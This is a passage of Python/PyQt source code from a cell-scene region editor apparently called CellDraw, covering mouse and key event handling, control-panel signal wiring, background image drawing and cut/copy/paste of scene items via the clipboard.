self.items(self.line.line().p1())\n            if len(startItems) and startItems[0] == self.line:\n                startItems.pop(0)\n            endItems = self.items(self.line.line().p2())\n            if len(endItems) and endItems[0] == self.line:\n                endItems.pop(0)\n\n            self.removeItem(self.line)\n            self.line = None\n\n            if 
len(startItems) and len(endItems) and \\\n                isinstance(startItems[0], DiagramItem) and \\\n                isinstance(endItems[0], DiagramItem) and \\\n                startItems[0] != endItems[0]:\n            startItem = startItems[0]\n            endItem = endItems[0]\n            arrow = Arrow(startItem, endItem)\n            arrow.setColor(self.myLineColor)\n            startItem.addArrow(arrow)\n            endItem.addArrow(arrow)\n            arrow.setZValue(-1000.0)\n            self.addItem(arrow)\n            arrow.updatePosition()\n\n        self.line = None\n\n        #\n        # 2010 - Mitja: update the scene's rectangle manually, so that it expands with all the scene elements:\n        #\n        # lNewSceneRect = self.itemsBoundingRect()\n        # if lNewSceneRect.isNull():\n        #     # if there are no elements, make the scene at least as large as the background image:\n        #     self.setSceneRect(self.theImageFromFile.rect())\n        # else:\n        #     # make the scene large enough to include both the elements as well as the background image dimensions:\n        #     self.setSceneRect(lNewSceneRect.united(self.theImageFromFile.rect()))\n        #\n        # does not seem to work properly.... the scene resizes in a weird way!?!\n        #\n\n        super(DiagramScene, self).mouseReleaseEvent(pMouseEvent)\n\n\n\n\n    # ------------------------------------------------------------\n    # 2012 - Mitja - keyReleaseEvent() added to handle key-release events\n    #   and pass them to theImageLayer when in SceneModeImageLayer mode.\n    # ------------------------------------------------------------\n    def keyReleaseEvent(self, pKeyEvent):\n\n        # 2012 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n        #   event processing, and pass the event to theCDImageLayer's own\n        #   keyReleaseEvent handler:\n        if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n            if isinstance(self.theImageLayer, CDImageLayer) == True:\n                self.theImageLayer.keyReleaseEvent(pKeyEvent)\n\n        super(DiagramScene, self).keyReleaseEvent(pKeyEvent)\n\n\n\n\n    # ------------------------------------------------------------\n    def isItemChange(self, type):\n        for item in self.selectedItems():\n            if isinstance(item, type):\n                return True\n        return False\n\n\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja: reset variables for resizing an item by using an outline:\n    def stopOutlineResizing(self):\n        self.myOutlineResizingItem = None\n        # myOutlineResizingVertex can be: \"None\", \"bottomLeft\", \"bottomRight\", \"topRight\", \"topLeft\":\n        self.myOutlineResizingVertex = \"None\"\n        self.myOutlineResizingCurrentX = -1.0\n        self.myOutlineResizingCurrentY = -1.0\n        self.update()\n        \n        \n\n    # ------------------------------------------------------------\n    # check if any of the vertices in the item's bounding rectangle is close to the mouse position,\n    #   and if so return its value - the input parameters are the item and the mouse's scene pos:\n    # ------------------------------------------------------------\n    def isCloseToOutlineVertex(self, pMyOutlineResizingItem, pMousePosInScene):\n        lBoundingRect = pMyOutlineResizingItem.sceneBoundingRect()\n        if self.vvIsCloseDistance(lBoundingRect.bottomLeft(), pMousePosInScene):\n            # CDConstants.printOut( \" \"+str( \"bottomLeft\" )+\" \", CDConstants.DebugTODO )\n            return \"bottomLeft\"\n        elif self.vvIsCloseDistance(lBoundingRect.bottomRight(), pMousePosInScene):\n            # CDConstants.printOut( \" \"+str( \"bottomRight\" )+\" \", CDConstants.DebugTODO )\n            return \"bottomRight\"\n        elif self.vvIsCloseDistance(lBoundingRect.topRight(), pMousePosInScene):\n            # CDConstants.printOut( \" \"+str( \"topRight\" )+\" \", CDConstants.DebugTODO )\n            return \"topRight\"\n        elif 
self.vvIsCloseDistance(lBoundingRect.topLeft(), pMousePosInScene):\n # CDConstants.printOut( \" \"+str( \"topLeft\" )+\" \", CDConstants.DebugTODO )\n return \"topLeft\"\n else:\n # CDConstants.printOut( \" \"+str( \"None\" )+\" \", CDConstants.DebugTODO )\n return \"None\"\n\n # ------------------------------------------------------------\n # provide vertex-to-vertex distance calculation:\n # ------------------------------------------------------------\n def vvIsCloseDistance(self, pV1, pV2):\n x1 = pV1.x()\n y1 = pV1.y()\n x2 = pV2.x()\n y2 = pV2.y()\n # CDConstants.printOut( \" \"+str( \"x1, y1, x2, y2, dist = \", x1, y1, x2, y2, math.sqrt( (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) ) )+\" \", CDConstants.DebugTODO )\n if math.sqrt( (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) ) < 6.0:\n return True\n else:\n return False\n\n\n\n\n\n# ------------------------------------------------------------\n# 2010 - Mitja - move from a QMainWindow class to a QWidget panel-type class\n# ------------------------------------------------------------\n# note: this class emits a signal: \"signalVisibilityPIFRegionTable\"\n# ------------------------------------------------------------\n# class DiagramSceneMainWindow(QtGui.QMainWindow):\nclass CDDiagramSceneMainWidget(QtGui.QWidget):\n\n mysignal = QtCore.pyqtSignal(str)\n\n signalVisibilityPIFRegionTable = QtCore.pyqtSignal(str)\n\n InsertTextButton = 10\n\n # 2010 - Mitja - since this class is not a QMainWindow class anymore,\n # we need to be able to access our \"parent\" class (a QMainWindow!)\n # to place menus and toolbars onto it.\n def __init__(self, pParentWindow = None):\n super(CDDiagramSceneMainWidget, self).__init__(pParentWindow)\n\n self.parentWindow = pParentWindow\n\n\n if self.parentWindow == None:\n # -> this is now called diagramSceneCreateActions() in ControllerMainWindow:\n # self.createActions()\n pass\n else:\n self.createSceneEditActions()\n\n # 2010 - Mitja: is there any real need for menus,\n # when all actions are reachable from toolbars?\n self.createMenus()\n \n\n # 2011 - Mitja: create the QGraphicsScene as main PIFF editing place:\n self.scene = DiagramScene(self.editMenu, self)\n # add a file associated to the scene:\n self.curFile = ''\n # 2010 - Mitja:\n # self.scene.setSceneRect(QtCore.QRectF(0, 0, 5000, 5000))\n self.scene.setSceneRect(QtCore.QRectF(0, 0, 240, 180))\n\n\n # -------------------------------------------------------------------\n\n # 2011 - Mitja: create a Control Panel with buttons & sliders:\n #\n # panel for PIFF parameters, with the CDDiagramSceneMainWidget as its parent\n # (that's why we pass \"self\" as parameter to the dialog panel) :\n self.windowPIFControlPanel = CDControlPanel(self)\n\n # 2011 - Mitja: we now place all toolbox items inside the main Control Panel.\n\n # -----------------------------------\n\n # 2011 - Mitja: to control the \"layer selection\" for Cell Scene mode,\n # we add a set of radio-buttons to the Control Panel:\n\n self.theControlsForLayerSelection = CDControlLayerSelection()\n\n # explicitly connect the \"signalLayersSelectionModeHasChanged()\"\n # signal from the theControlsForLayerSelection object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForLayerSelection.signalLayersSelectionModeHasChanged.connect( \\\n self.handleLayersSelectionModeHasChanged )\n\n # place the layer selection buttons in the control panel:\n self.windowPIFControlPanel.setControlsForLayerSelection( \\\n self.theControlsForLayerSelection)\n\n # -----------------------------------\n\n 
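# note: all the control-panel widgets wired up below follow the same\n        #   new-style PyQt signal/slot pattern. A minimal standalone sketch of\n        #   that pattern (hypothetical names, for illustration only - this is\n        #   not CellDraw code):\n        #\n        #     class CDControlExample(QtCore.QObject):\n        #         signalValueHasChanged = QtCore.pyqtSignal(int)\n        #         def setValue(self, pValue):\n        #             self.signalValueHasChanged.emit(pValue)\n        #\n        #     lControl = CDControlExample()\n        #     lControl.signalValueHasChanged.connect(self.handleValueHasChanged)\n        #     lControl.setValue(42)   # self.handleValueHasChanged(42) gets called\n\n        # -----------------------------------\n\n        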
# 2011 - Mitja: to control Cell Scene \"scale/zoom\" factor,\n # we add a combobox (pop-up menu) to the Control Panel:\n\n self.theSceneScaleZoomControl = CDControlSceneScaleZoom()\n\n # explicitly connect the \"signalScaleZoomHasChanged()\"\n # signal from the theSceneScaleZoomControl object,\n # to our \"slot\" method responding to radio button changes:\n self.theSceneScaleZoomControl.signalScaleZoomHasChanged.connect( \\\n self.handleSceneScaleZoomChanged )\n\n # place the layer selection buttons in the control panel:\n self.windowPIFControlPanel.setControlsForSceneScaleZoom( \\\n self.theSceneScaleZoomControl)\n\n # -----------------------------------\n\n # 2011 - Mitja: to control the \"drawing toggle\" for regions vs. cells,\n # we add radio-buttons to the Control Panel:\n\n self.theToggleforRegionOrCellDrawing = CDControlRegionOrCell()\n\n # explicitly connect the \"signalSetRegionOrCell()\" signal from the\n # theToggleforRegionOrCellDrawing object, to our \"slot\" method\n # so that it will respond to any change in radio button choices:\n\n answer = self.theToggleforRegionOrCellDrawing.signalSetRegionOrCell.connect( \\\n self.handleToggleRegionOrCellDrawingChanged)\n\n # place the drawing toggle GUI in the control panel:\n self.windowPIFControlPanel.setControlsForDrawingRegionOrCellToggle( \\\n self.theToggleforRegionOrCellDrawing)\n\n # -----------------------------------\n\n # Here we provide a logical button group for Region Shapes button widgets\n # that are going to be placed inside the main Control Panel:\n self.theButtonGroupForRegionShapes = self.createButtonGroupForRegionShapes()\n # Here we provide a logical button group for Background button widgets\n # that are going to be placed inside the main Control Panel:\n self.theButtonGroupForBackgrounds = self.createButtonGroupForBackgrounds()\n\n self.windowPIFControlPanel.setButtonGroupForRegionShapes( \\\n self.theButtonGroupForRegionShapes )\n\n self.windowPIFControlPanel.setButtonGroupForBackgrounds( \\\n self.theButtonGroupForBackgrounds )\n\n # create four icons for the basic four region DiagramItem buttons:\n lItem = DiagramItem(DiagramItem.RectangleConst, self.editMenu)\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon() )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.RectangleConst, lIcon)\n\n lItem = DiagramItem(DiagramItem.TenByTenBoxConst, self.editMenu)\n # u\"\\u00D7\" # <-- the multiplication sign as unicode\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon(\"10\" + u\"\\u00D7\" + \"10\") )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.TenByTenBoxConst, lIcon)\n\n lItem = DiagramItem(DiagramItem.TwoByTwoBoxConst, self.editMenu)\n # u\"\\u00D7\" # <-- the multiplication sign as unicode\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon(\"2 \" + u\"\\u00D7\" + \" 2\") )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.TwoByTwoBoxConst, lIcon)\n\n\n # the \"PathConst\" is not there since it's generated by CDControlPanel internally:\n # lItem = DiagramItem(DiagramItem.PathConst, self.editMenu)\n # lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon() )\n # self.windowPIFControlPanel.setWidgetIcon(DiagramItem.PathConst, lIcon)\n lItem = 0\n\n # -----------------------------------\n\n # 2010 - Mitja: add code for new backgrounds:\n lBoringPixMap = QtGui.QPixmap(240, 180)\n lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.white) )\n self.theImageFromFile = QtGui.QImage(lBoringPixMap)\n self.theImageNameFromFile = \"BlankBackground\"\n\n # -----------------------------------\n\n # 2011 - 
Mitja: to control the \"picking mode\" for the input image,\n # we add a set of radio-buttons and a slider to the Control Panel:\n\n self.theControlsForInputImagePicking = CDControlInputImage()\n # explicitly connect the \"inputImagePickingModeChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in radio button choices:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"inputImagePickingModeChangedSignal()\"), \\\n self.handleInputImagePickingModeChanged )\n # explicitly connect the \"inputImageOpacityChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"inputImageOpacityChangedSignal()\"), \\\n self.handleImageOpacityChanged )\n # explicitly connect the \"fuzzyPickTresholdChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"fuzzyPickTresholdChangedSignal()\"), \\\n self.handleFuzzyPickThresholdChanged )\n\n # explicitly connect the \"signalImageScaleZoomHasChanged()\"\n # signal from the theControlsForInputImagePicking object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForInputImagePicking.signalImageScaleZoomHasChanged.connect( \\\n self.handleImageScaleZoomChanged )\n\n\n # 2011 - Mitja: since the self.theControlsForInputImagePicking widget is used\n # to control QGraphicsScene's theCDImageLayer's behavior, it's initially not enabled:\n self.theControlsForInputImagePicking.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForInputImagePicking( \\\n self.theControlsForInputImagePicking)\n\n\n\n\n # -----------------------------------\n\n # 2011 - Mitja: to access the \"image sequence\",\n # we add a set of buttons and sliders to the Control Panel:\n\n self.theControlsForImageSequence = CDControlImageSequence()\n\n # explicitly connect the \"signalSelectedImageInSequenceHasChanged()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n self.theControlsForImageSequence.signalSelectedImageInSequenceHasChanged.connect( \\\n self.handleSelectedImageWithinSequenceChanged )\n\n\n # explicitly connect the \"signalImageSequenceProcessingModeHasChanged()\"\n # signal from the theControlsForImageSequence object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForImageSequence.signalImageSequenceProcessingModeHasChanged.connect( \\\n self.handleAreaOrEdgeModeHasChanged )\n\n\n # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method:\n\n answer = self.theControlsForImageSequence.signalSetCurrentTypeColor.connect( \\\n self.handleTypesColorEvent)\n\n # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method:\n answer = self.theControlsForImageSequence.signalForPIFFTableToggle.connect( \\\n self.handlePIFRegionTableButton)\n\n\n # 2011 - Mitja: since the self.theControlsForImageSequence widget is used\n # to control an Image Sequence, it's initially not enabled:\n 
self.theControlsForImageSequence.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForImageSequence( \\\n self.theControlsForImageSequence)\n\n\n\n\n\n\n\n\n\n\n # -----------------------------------\n\n # 2011 - Mitja: to access the \"image sequence\",\n # we add a set of buttons and sliders to the Control Panel:\n\n self.theControlsForClusters = CDControlClusters()\n# \n# # explicitly connect the \"signalSelectedImageInSequenceHasChanged()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method\n# # so that it will respond to any change in slider values:\n# self.theControlsForClusters.signalSelectedImageInSequenceHasChanged.connect( \\\n# self.handleSelectedImageWithinSequenceChanged )\n# \n# \n# # explicitly connect the \"signalImageSequenceProcessingModeHasChanged()\"\n# # signal from the theControlsForClusters object,\n# # to our \"slot\" method responding to radio button changes:\n# self.theControlsForClusters.signalImageSequenceProcessingModeHasChanged.connect( \\\n# self.handleAreaOrEdgeModeHasChanged )\n# \n# # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method:\n# \n# answer = self.theControlsForClusters.signalSetCurrentTypeColor.connect( \\\n# self.handleTypesColorEvent)\n# \n# # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method:\n# answer = self.theControlsForClusters.signalForPIFFTableToggle.connect( \\\n# self.handlePIFRegionTableButton)\n# \n# \n# # 2011 - Mitja: since the self.theControlsForClusters widget is used\n# # to control an Image Sequence, it's initially not enabled:\n# self.theControlsForClusters.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForClusters( \\\n self.theControlsForClusters)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Scene Item Edit\" controls,\n # containing basic scene editing actions:\n #\n self.theControlsForSceneItemEdit = PIFControlSceneItemEdit()\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.cutAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.copyAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.pasteAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.deleteAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.toFrontAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.sendBackAction)\n self.theControlsForSceneItemEdit.populateControlsForSceneItemEdit()\n\n self.windowPIFControlPanel.setControlsForSceneItemEdit( \\\n self.theControlsForSceneItemEdit)\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: controls for setting types of regions and cells:\n #\n self.theControlsForTypes = CDControlTypes()\n\n # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n # theControlsForTypes object, to our \"slot\" method:\n\n answer = self.theControlsForTypes.signalSetCurrentTypeColor.connect( \\\n self.handleTypesColorEvent)\n\n # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n # theControlsForTypes object, to our \"slot\" method:\n answer = self.theControlsForTypes.signalForPIFFTableToggle.connect( \\\n self.handlePIFRegionTableButton)\n\n # add the Table of Types window show/hide toggle action to the windowMenu in the main menu bar:\n 
self.theControlsForTypes.setMenuForTableAction(self.windowMenu)\n\n        self.windowPIFControlPanel.setControlsForTypes( self.theControlsForTypes)\n        \n\n        # ------------------------------------------------------------\n\n        # populate the PIFF control panel toolbar with its content, i.e.\n        #   now that we passed all the required data, generate the Control Panel GUI:\n        self.windowPIFControlPanel.populateControlPanel()\n\n        # and finally show the PIFF control panel:\n        self.windowPIFControlPanel.show()\n\n        # ----------------------\n\n        # self.createToolbars()\n\n        self.setLayout(QtGui.QHBoxLayout())\n        self.layout().setMargin(2)\n        self.layout().setAlignment(QtCore.Qt.AlignCenter)\n\n        self.view = QtGui.QGraphicsView(self.scene)\n        # our QGraphicsView will not accept partial viewport updates:\n        self.view.setViewportUpdateMode(QtGui.QGraphicsView.FullViewportUpdate) \n        # when the view is resized, the view leaves the scene's *position* unchanged\n        self.view.setResizeAnchor(QtGui.QGraphicsView.NoAnchor)\n        # when the whole scene is visible in the view, where is it aligned?\n        self.view.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignVCenter)\n\n        # take care of the RHS <-> LHS mismatch at its visible end,\n        #   by flipping the y coordinate in the QGraphicsView's affine transformations:\n        self.view.scale(1.0, -1.0)\n\n        self.layout().addWidget(self.view)\n        \n        # 2011 - Mitja: add a separate image layer object\n        #   to paint piff input images on the top of the QGraphicsScene:\n        self.theCDImageLayer = CDImageLayer(self)\n        self.scene.setImageLayer(self.theCDImageLayer)\n\n\n        # 2011 - Mitja: add a separate object to handle a sequence of images:\n        self.theCDImageSequence = CDImageSequence(self)\n        self.scene.setImageSequence(self.theCDImageSequence)\n\n\n        self.connectSignals()\n\n        self.setWindowTitle(\"Cell Scene Region Editor\")\n        self.show()\n\n\n\n    # ------------------------------------------------------------------\n    # 2011 - Mitja: assign CellDraw preferences object:\n    # ------------------------------------------------------------------\n    def setPreferencesObject(self, pCDPreferences=None):\n        self.cdPreferences = pCDPreferences\n        CDConstants.printOut( \">>>>>>>>>>>>>>>>>>>>>>>> CDDiagramSceneMainWidget.cdPreferences is now =\" + str(self.cdPreferences), CDConstants.DebugVerbose )\n\n\n    # ------------------------------------------------------------\n    def handlerForButtonGroupBackgroundsClicked(self, pButton):\n        theBgButtons = self.theButtonGroupForBackgrounds.buttons()\n        for myButton in theBgButtons:\n            if myButton != pButton:\n                myButton.setChecked(False)\n            # CDConstants.printOut( \" \"+str( \"handlerForButtonGroupBackgroundsClicked() myButton =\",myButton,\\ )+\" \", CDConstants.DebugTODO )\n            #     \" isChecked() =\", myButton.isChecked()\n\n        text = pButton.text()\n\n        self.updateSceneBackgroundImage(text)\n\n\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja - separated updateSceneBackgroundImage() from\n    #   handlerForButtonGroupBackgroundsClicked(), so that the following functionality is reachable\n    #   also when there is no toolbox click, but a change either in the scene dimensions\n    #   or in the background image source itself.\n    # ------------------------------------------------------------\n    def updateSceneBackgroundImage(self, pText):\n        # ------------------------------------------------------------\n        # create a pixmap that's at least as wide/tall as the current scene,\n        #   and large enough to fit the background image's size, positioned at 0,0,\n        #   and at least 2000x2000 in size so as not 
to have tiling of the background image:\n lTempLargestQPixmapRect = QtCore.QRect(0, 0, 2000, 2000)\n lBackgroundRect = QtCore.QRectF( \\\n self.scene.sceneRect().united( \\\n QtCore.QRectF(self.theImageFromFile.rect().united(lTempLargestQPixmapRect) ) \\\n ) \\\n )\n lPixmap = QtGui.QPixmap(lBackgroundRect.width(), lBackgroundRect.height())\n # lPixmap.fill( QtGui.QPalette.color(QtGui.QPalette(), QtGui.QPalette.Base) )\n lPixmap.fill( QtGui.QColor(QtCore.Qt.gray) )\n lPainter = QtGui.QPainter(lPixmap)\n\n # create another pixmap of the same size as the graphics scene rectangle, and fill it with the chosen background pattern:\n lTmpPixmap = QtGui.QPixmap( self.scene.width(), self.scene.height() )\n lTmpPixmap.fill( QtGui.QColor(QtCore.Qt.white) )\n lTmpPainter = QtGui.QPainter(lTmpPixmap)\n\n if pText == \"Blue Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background1.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background1.png')))\n elif pText == \"White Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background2.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background2.png')))\n elif pText == \"Gray Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background3.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background3.png')))\n elif pText == \"No Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background4.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background4.png')))\n # 2010 - Mitja: add code for new backgrounds:\n else:\n # lPixmap.fill( QtGui.QPalette.color(QtGui.QPalette(), QtGui.QPalette.Base) )\n # lPainter.drawImage(QtCore.QPoint(0,0), self.theImageFromFile)\n\n # immediately transform the starting/loaded QImage: invert Y values, from RHS to LHS:\n lWidth = self.theImageFromFile.width()\n lHeight = self.theImageFromFile.height()\n\n # take care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QPainter's affine transformations: \n lTmpPainter.translate(0.0, float(lHeight))\n lTmpPainter.scale(1.0, -1.0)\n \n # access the QLabel's pixmap to draw it explicitly, using QPainter's scaling:\n lTmpPainter.drawImage(QtCore.QPoint(0,0), self.theImageFromFile)\n\n lTmpPainter.end()\n lPainter.drawPixmap(QtCore.QPoint(0,0), lTmpPixmap)\n lPainter.end()\n\n # 2010 - Mitja: update the background image from file:\n # self.theImageFromFile = QtGui.QImage(lPixmap)\n # 2010 - Mitja: if we wanted to update the scene size to fit to the background image, we'd do this:\n # self.scene.setSceneRect(lBackgroundRect)\n\n self.scene.setBackgroundBrush(QtGui.QBrush(lPixmap))\n\n self.scene.update()\n self.view.update()\n # CDConstants.printOut( \" \"+str( \"___ - DEBUG ----- CDDiagramSceneMainWidget: updateSceneBackgroundImage() lBackgroundRect =\", lBackgroundRect, \"done.\" )+\" \", CDConstants.DebugTODO )\n # end of def updateSceneBackgroundImage(self, pText)\n # ------------------------------------------------------------\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add code for new items being either a cell or a region:\n # ------------------------------------------------------------\n def handlerForButtonGroupRegionShapesClicked(self, id):\n buttons = self.theButtonGroupForRegionShapes.buttons()\n for button in 
buttons:\n if self.theButtonGroupForRegionShapes.button(id) != button:\n button.setChecked(False)\n\n if id == self.InsertTextButton:\n self.scene.setMode(CDConstants.SceneModeInsertText)\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n else:\n self.scene.setItemType(id)\n self.scene.setMode(CDConstants.SceneModeInsertItem)\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for toggling on/off the Table of Types Window:\n # ------------------------------------------------------------\n def handlePIFRegionTableButton(self, pString):\n # propagate the signal upstream, for example to parent objects:\n self.signalVisibilityPIFRegionTable.emit(pString)\n# CDConstants.printOut( \" \"+str( \"handlePIFRegionTableButton\" )+\" \", CDConstants.DebugTODO )\n # TODO add show/hide of table when there are no rows\n # TODO add showing rows in the table when a new region is added\n# CDConstants.printOut( \" \"+str( \"handlePIFRegionTableButton\" )+\" \", CDConstants.DebugTODO )\n pass\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for cut/copy/paste of scene items:\n # ------------------------------------------------------------\n def cutItem(self):\n # pass a True parameter to copyItem(), signalling that we\n # are about to delete the original, so copyItem() knows\n # that the call has originated from a cutItem():\n self.copyItem(True)\n self.deleteItem()\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for cut/copy/paste of scene items:\n # ------------------------------------------------------------\n def copyItem(self, pItemHasBeenCut = False):\n # the optional pItemHasBeenCut parameter is to be set to True\n # if the call has originated from a cutItem(), i.e. 
the original\n        #   item has now been deleted, so we keep its scene position unmodified.\n        #   Otherwise (for copy-paste) it'll be shifted slightly, so that the user\n        #   will see that it's a pasted item.\n\n        lAllSelectedItems = self.scene.selectedItems()\n        # make sure that there is at least one selected item:\n        if not lAllSelectedItems:\n            # CDConstants.printOut( \" \"+str( \"#=#=#=#=#=#=#=# copyItem() lAllSelectedItems =\", lAllSelectedItems )+\" \", CDConstants.DebugTODO )\n            return\n\n        # we copy the first selected item:\n        lFirstSelectedItem = lAllSelectedItems[0]\n        \n        # get all the necessary information from the item:\n        lSelectedItemPosition = lFirstSelectedItem.scenePos()\n        lSelectedItemHasBeenCut = pItemHasBeenCut\n        lSelectedItemColor = lFirstSelectedItem.brush().color()\n        lSelectedItemRegionOrCell = lFirstSelectedItem.itsaRegionOrCell\n        lSelectedItemType = lFirstSelectedItem.diagramType\n        lSelectedItemScaleX = lFirstSelectedItem.myScaleX\n        lSelectedItemScaleY = lFirstSelectedItem.myScaleY\n        lSelectedItemPolygon = lFirstSelectedItem.polygon()\n\n        lPointListX = [] \n        lPointListY = [] \n        for lPointF in lSelectedItemPolygon:\n            # CDConstants.printOut( \" \"+str( \"lPointF = \", lPointF )+\" \", CDConstants.DebugTODO )\n            lPointListX.append(lPointF.x())\n            lPointListY.append(lPointF.y())\n\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemPosition =\", lSelectedItemPosition )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemHasBeenCut =\", lSelectedItemHasBeenCut )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemColor =\", lSelectedItemColor )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemRegionOrCell =\", lSelectedItemRegionOrCell )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemType =\", lSelectedItemType )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemScaleX =\", lSelectedItemScaleX )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemScaleY =\", lSelectedItemScaleY )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lPointListX =\", lPointListX )+\" \", CDConstants.DebugTODO )\n        # CDConstants.printOut( \" \"+str( \"COPY: lPointListY =\", lPointListY )+\" \", CDConstants.DebugTODO )\n\n        # create an empty byte array:\n        lItemDataByteArray = QtCore.QByteArray()\n\n        # open a data stream that can write to the new byte array:\n        lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.WriteOnly)\n\n        # write into the datastream:\n        lDataStream.writeQVariant(lSelectedItemPosition)\n        lDataStream.writeQVariant(lSelectedItemHasBeenCut)\n        lDataStream.writeQVariant(lSelectedItemColor)\n        lDataStream.writeQVariant(lSelectedItemRegionOrCell)\n        lDataStream.writeQVariant(lSelectedItemType)\n        lDataStream.writeQVariant(lSelectedItemScaleX)\n        lDataStream.writeQVariant(lSelectedItemScaleY)\n        lDataStream.writeQVariant(lPointListX)\n        lDataStream.writeQVariant(lPointListY)\n\n        # place the byte array into a mime data container:\n        lMimeData = QtCore.QMimeData()\n        lMimeData.setData('application/x-pif-region-item', lItemDataByteArray)\n\n        # 2010 - Mitja: this is our clipboard for cut/copy/paste operations,\n        #   it provides access to the single QClipboard object in the application.\n        #   As from Qt documentation:\n        #   \"Note: The QApplication object should already be constructed before accessing the clipboard.\"\n\n        # place the MIME data into the 
application clipboard:\n        lClipboard = QtGui.QApplication.clipboard()\n        lClipboard.setMimeData(lMimeData)\n\n        # fix for yet another PyQt bug, according to:\n        #   http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html\n        #   we have to manually emit a clipboard-related event, even though we\n        #   just explicitly set its MIME data above.\n        lEvent = QtCore.QEvent(QtCore.QEvent.Clipboard)\n        QtGui.QApplication.sendEvent(lClipboard, lEvent)\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja: add code for cut/copy/paste of scene items:\n    # ------------------------------------------------------------\n    def pasteItem(self):\n        # get the application's clipboard:\n        lClipboard = QtGui.QApplication.clipboard()\n        if lClipboard == None:\n            return\n\n        # get the mime data from the application clipboard:\n        lMimeData = lClipboard.mimeData()\n\n        # if the MIME type is the one we specify, let's use the data:\n        if lMimeData.hasFormat('application/x-pif-region-item'):\n            # data() returns a byte array containing the data stored in the clipboard,\n            #   in the format described by the specified MIME type:\n            lItemDataByteArray = lMimeData.data('application/x-pif-region-item')\n            